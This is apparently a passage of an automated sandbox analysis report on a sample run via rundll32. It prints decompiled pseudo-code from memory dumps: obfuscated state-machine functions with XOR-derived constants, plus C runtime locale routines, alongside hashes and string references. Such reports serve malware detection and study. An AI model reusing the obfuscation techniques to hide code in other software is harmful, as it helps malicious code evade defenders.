				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E00B37F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E00B2D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E00B37F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E00B37F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E00B2D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E00B37F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E00B2D64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E00B37F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}

0x00b37f1f
0x00b37f22
0x00b37f2c
0x00b37f34
0x00b37f40
0x00b37f42
0x00b37f44
0x00b37f48
0x00b37f4d
0x00b37f55
0x00b37f60
0x00b37f65
0x00b37f6b
0x00b37f73
0x00b37f7b
0x00b37f83
0x00b37f8b
0x00b37f93
0x00b37f9b
0x00b37fa0
0x00b37fa8
0x00b37fb0
0x00b37fb8
0x00b37fbd
0x00b37fc7
0x00b37fca
0x00b37fce
0x00b37fd6
0x00b37fe6
0x00b37fea
0x00b37ff2
0x00b37ffa
0x00b38002
0x00b3800a
0x00b38012
0x00b3801a
0x00b38022
0x00b3802a
0x00b38032
0x00b3803a
0x00b38042
0x00b3804a
0x00b38052
0x00b3805a
0x00b38062
0x00b38067
0x00b3806f
0x00b38077
0x00b3807f
0x00b38084
0x00b3808c
0x00b38094
0x00b380a0
0x00b380a3
0x00b380a7
0x00b380af
0x00b380b7
0x00b380bf
0x00b380c9
0x00b380cd
0x00b380d5
0x00b380dd
0x00b380e5
0x00b380ed
0x00b380f5
0x00b3810b
0x00b3810f
0x00b38114
0x00b3811c
0x00b38124
0x00b38134
0x00b38138
0x00b38144
0x00b38149
0x00b3814f
0x00b38157
0x00b38164
0x00b38165
0x00b38169
0x00b38171
0x00b38179
0x00b38181
0x00b38186
0x00b3818e
0x00b38196
0x00b3819b
0x00b381a3
0x00b381ab
0x00b381b3
0x00b381bb
0x00b381bf
0x00b381c7
0x00b381d4
0x00b381dd
0x00b381e1
0x00b381e9
0x00b381f6
0x00b381fa
0x00b38202
0x00b3820a
0x00b38218
0x00b3821c
0x00b3821c
0x00b38224
0x00b38224
0x00b38224
0x00b38224
0x00b38226
0x00000000
0x00000000
0x00b3822c
0x00b382c7
0x00b382c8
0x00b382cd
0x00b382d0
0x00b382d5
0x00000000
0x00b38232
0x00b38238
0x00b382b5
0x00000000
0x00b3823a
0x00b38240
0x00b3829d
0x00b382a1
0x00b382a6
0x00b382a9
0x00b382ae
0x00000000
0x00b38242
0x00b38248
0x00b3827b
0x00b3827c
0x00b38281
0x00b38284
0x00b38289
0x00000000
0x00b3824a
0x00b38250
0x00000000
0x00b38256
0x00b3825e
0x00b38267
0x00b38267
0x00b38250
0x00b38248
0x00b38240
0x00b38238
0x00b38269
0x00b38272
0x00b38272
0x00b382e2
0x00b38368
0x00b3836c
0x00b38371
0x00b38374
0x00b38379
0x00000000
0x00b382e4
0x00b382ea
0x00b38346
0x00b38347
0x00b3834c
0x00b3834f
0x00b38351
0x00000000
0x00b382ec
0x00b382f2
0x00b38326
0x00b3832a
0x00b3832f
0x00b38332
0x00b38337
0x00000000
0x00b382f4
0x00b382fa
0x00000000
0x00b382fc
0x00b38304
0x00b38305
0x00b3830a
0x00b3830d
0x00b38312
0x00000000
0x00b38312
0x00b382fa
0x00b382f2
0x00b382ea
0x00000000
0x00b3837b
0x00b3837b
0x00000000

Strings

,H, xrefs: 00B381AB
~, xrefs: 00B3803A
S,, xrefs: 00B38157
9c%', xrefs: 00B382EC
bh, xrefs: 00B3806F
9c%', xrefs: 00B382B5
XW, xrefs: 00B3808C

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,H$9c%'$9c%'$S,$XW$bh$~
API String ID: 0-4263808623
Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction ID: dd5651f3dfb3d0589b9fe17eb852714c0983688505265d1dd346ddbddc1caaf2
Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction Fuzzy Hash: 91B132B29093808FD358CF25D98A40BFBE1BBC4748F508A5DF58696260DBB5DA09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 00B269A0, Relevance: 9.0, Strings: 7, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B269A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E00B28736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E00B2F536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0xb3ca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0xb3ca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E00B3422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E00B36DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E00B21132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00B39586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E00B276DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}

0x00b269a0
0x00b269a3
0x00b269af
0x00b269b1
0x00b269b3
0x00b269b9
0x00b269c1
0x00b269c3
0x00b269c8
0x00b269cd
0x00b269d5
0x00b269dd
0x00b269e5
0x00b269ed
0x00b269f5
0x00b269fd
0x00b26a0b
0x00b26a10
0x00b26a16
0x00b26a1e
0x00b26a26
0x00b26a32
0x00b26a37
0x00b26a3d
0x00b26a42
0x00b26a4a
0x00b26a52
0x00b26a5a
0x00b26a5f
0x00b26a67
0x00b26a6f
0x00b26a77
0x00b26a7f
0x00b26a87
0x00b26a8c
0x00b26a94
0x00b26a9c
0x00b26aa4
0x00b26aac
0x00b26ab4
0x00b26abc
0x00b26ac4
0x00b26acc
0x00b26ad4
0x00b26adc
0x00b26ae4
0x00b26aec
0x00b26af1
0x00b26af9
0x00b26b01
0x00b26b09
0x00b26b11
0x00b26b1a
0x00b26b1d
0x00b26b21
0x00b26b29
0x00b26b31
0x00b26b39
0x00b26b41
0x00b26b49
0x00b26b51
0x00b26b59
0x00b26b61
0x00b26b69
0x00b26b71
0x00b26b79
0x00b26b81
0x00b26b8b
0x00b26b90
0x00b26b95
0x00b26b9d
0x00b26ba5
0x00b26bad
0x00b26bb5
0x00b26bbd
0x00b26bc5
0x00b26bd2
0x00b26bd6
0x00b26bde
0x00b26be6
0x00b26bee
0x00b26bf6
0x00b26bfe
0x00b26c06
0x00b26c0e
0x00b26c16
0x00b26c1e
0x00b26c1e
0x00b26c1e
0x00b26c23
0x00000000
0x00b26c28
0x00b26c28
0x00b26c2e
0x00b26d35
0x00b26d36
0x00b26d39
0x00b26d3f
0x00b26d43
0x00b26d45
0x00b26d4e
0x00b26d53
0x00b26d58
0x00b26d5d
0x00000000
0x00b26d5d
0x00b26d47
0x00b26d22
0x00b26d22
0x00b26cca
0x00b26cca
0x00b26ccf
0x00b26ccf
0x00000000
0x00b26ccf
0x00b26c3a
0x00000000
0x00b26d96
0x00b26c42
0x00b26d70
0x00b26d73
0x00b26d78
0x00b26d7b
0x00000000
0x00b26d7b
0x00b26c4e
0x00b26d17
0x00b26d1d
0x00000000
0x00b26d1d
0x00b26c5a
0x00b26cd9
0x00b26ceb
0x00b26cf0
0x00b26cf3
0x00b26cf6
0x00b26cfd
0x00b26d02
0x00b26d07
0x00000000
0x00b26d07
0x00b26c5e
0x00b26c93
0x00b26cb0
0x00b26cb5
0x00b26cb8
0x00b26cbb
0x00b26cc2
0x00b26cc7
0x00000000
0x00b26cc7
0x00b26c62
0x00000000
0x00000000
0x00b26c77
0x00b26c7c
0x00b26c7f
0x00b26c89
0x00b26c8e
0x00000000
0x00b26d62
0x00b26d62
0x00b26d62
0x00000000
0x00b26c28
0x00b26c28

Strings

'&/U, xrefs: 00B26AB4
"=, xrefs: 00B26B79
y7X, xrefs: 00B26B71
GX, xrefs: 00B26A67
?j, xrefs: 00B26B39
k<, xrefs: 00B26A1E
.V, xrefs: 00B26AD4

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "=$'&/U$.V$?j$GX$y7X$k<
API String ID: 0-2482092835
Opcode ID: 2d06a54fbc1ab995228319341ffa1f50c80a463941815db2644dd57c5ae426c1
Instruction ID: 225131af0d83fbca99ed245e5cb29a62207b3dc19167930849767921ef492b14
Opcode Fuzzy Hash: 2d06a54fbc1ab995228319341ffa1f50c80a463941815db2644dd57c5ae426c1
Instruction Fuzzy Hash: A6A174B2908341AFD358CF25D58A40BFBE1FBD4354F508A1DF48AA6260D7B5D909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10030B69, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10030B69(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E1000FF85(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x10030b6e
0x10030b6f
0x10030b76
0x10030c1a
0x10030c33
0x10030c39
0x10030c3e
0x10030c40
0x10030c40
0x10030c46
0x10030c49
0x10030c49
0x10030c35
0x10030c35
0x00000000
0x10030c35
0x10030b7c
0x10030b81
0x00000000
0x00000000
0x10030b87
0x10030b8c
0x10030b8e
0x10030b8e
0x10030b94
0x00000000
0x00000000
0x10030b99
0x10030bb0
0x10030bb0
0x10030bb9
0x10030bbb
0x00000000
0x00000000
0x10030bbd
0x10030bc2
0x10030bc4
0x10030bc4
0x10030bca
0x00000000
0x00000000
0x10030bcf
0x10030bed
0x10030bef
0x10030c12
0x00000000
0x10030c17
0x10030c0a
0x00000000
0x00000000
0x10030c0c
0x00000000
0x10030c0c
0x10030bd1
0x10030bd9
0x00000000
0x00000000
0x10030bdb
0x10030bde
0x10030be4
0x00000000
0x00000000
0x00000000
0x10030be6
0x10030be8
0x10030bea
0x00000000
0x10030bea
0x10030b9b
0x10030ba3
0x00000000
0x00000000
0x10030ba5
0x10030ba8
0x10030bae
0x00000000
0x00000000
0x00000000
0x10030bae
0x10030bb4
0x10030bb6
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,10030E87,00000002,00000000,?,?,?,10030E87,?,00000000), ref: 10030C02
GetLocaleInfoW.KERNEL32(?,20001004,10030E87,00000002,00000000,?,?,?,10030E87,?,00000000), ref: 10030C2B
GetACP.KERNEL32(?,?,10030E87,?,00000000), ref: 10030C40

Strings

OCP, xrefs: 10030BBD
ACP, xrefs: 10030B87

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 9307766cf3f7ef350b833b5ae7400d82360007ee80431dcbf2b3d6834d8a2fd9
Instruction ID: 7366726ca8dfa1b6abe0b51d376a4784dd352efd1aa5aec34e5175226514a72e
Opcode Fuzzy Hash: 9307766cf3f7ef350b833b5ae7400d82360007ee80431dcbf2b3d6834d8a2fd9
Instruction Fuzzy Hash: 1921A472612105AFE726CF15C960A8BB2E6EF44AE6F538164F909DF215E732DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 10030D3E, Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10030D3E(void* __ecx, void* __edx, void* __eflags, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed int _t101;
				signed short _t104;
				signed int _t105;
				void* _t106;

				_t39 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t39 ^ _t105;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E10023FB6(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E10023FB6(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[1]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x10045ffc; // 0x17
					E10030CDD(_t89, 0, 0x10045ee8, _t83 - 1, _t99);
					_t46 = _v24;
					_t106 = _t106 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E10030661(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E10030765(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t104 = E10030B69(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t104;
							if(_t104 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E100037EA(_t53, _v8 ^ _t105, _t97);
							}
							_t55 = IsValidCodePage(_t104 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t104;
							}
							E1002A393(_v16,  &(_v24[0x94]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E1002A393(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E10038569(_t38, _t104, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x10045ee4; // 0x41
						_t75 = E10030CDD(_t89, _t97, 0x10045bd8, _t73 - 1, _v24);
						_t106 = _t106 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E10030765(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t119 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E100306CA(_t89, _t97, _t119,  &_v20);
						goto L15;
					}
					_t115 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E100306CA(_t89, _t97, _t115,  &_v20);
					goto L9;
				}
			}

0x10030d46
0x10030d4d
0x10030d54
0x10030d58
0x10030d5c
0x10030d6a
0x10030d6f
0x10030d70
0x10030d71
0x10030d72
0x10030d7a
0x10030d7c
0x10030d82
0x10030d88
0x10030d8b
0x10030d8d
0x10030d90
0x10030d94
0x10030d9b
0x10030da8
0x10030dad
0x10030db0
0x10030db3
0x10030db3
0x10030db5
0x10030db8
0x10030dbc
0x10030e2c
0x10030e2e
0x10030e30
0x10030e43
0x10030e43
0x10030e4a
0x10030e50
0x10030e53
0x00000000
0x10030e53
0x10030e32
0x10030e35
0x00000000
0x00000000
0x10030e3b
0x10030e40
0x00000000
0x10030dc3
0x10030dc3
0x10030dc7
0x10030dd9
0x10030ddd
0x10030de2
0x10030de6
0x10030de7
0x10030e6f
0x10030e6f
0x10030e71
0x10030e7d
0x10030e87
0x10030e8b
0x10030e8d
0x10030e5e
0x10030e5e
0x10030e60
0x10030e6e
0x10030e6e
0x10030e93
0x10030e99
0x10030e9b
0x00000000
0x00000000
0x10030ea2
0x10030ea8
0x10030eaa
0x00000000
0x00000000
0x10030eac
0x10030eaf
0x10030eb1
0x10030eb3
0x10030eb3
0x10030ec4
0x10030ec9
0x10030ecb
0x10030f2b
0x10030f2d
0x00000000
0x10030f2d
0x10030ed0
0x10030eda
0x10030eea
0x10030ef0
0x10030ef2
0x00000000
0x00000000
0x10030efa
0x10030f09
0x10030f0f
0x10030f11
0x00000000
0x00000000
0x10030f1b
0x10030f23
0x00000000
0x10030f28
0x10030ded
0x10030dfc
0x10030e01
0x10030e06
0x10030e56
0x10030e56
0x10030e56
0x10030e58
0x10030e5c
0x00000000
0x00000000
0x00000000
0x10030e5c
0x10030e08
0x10030e0a
0x10030e0e
0x10030e20
0x10030e24
0x10030e29
0x10030e29
0x00000000
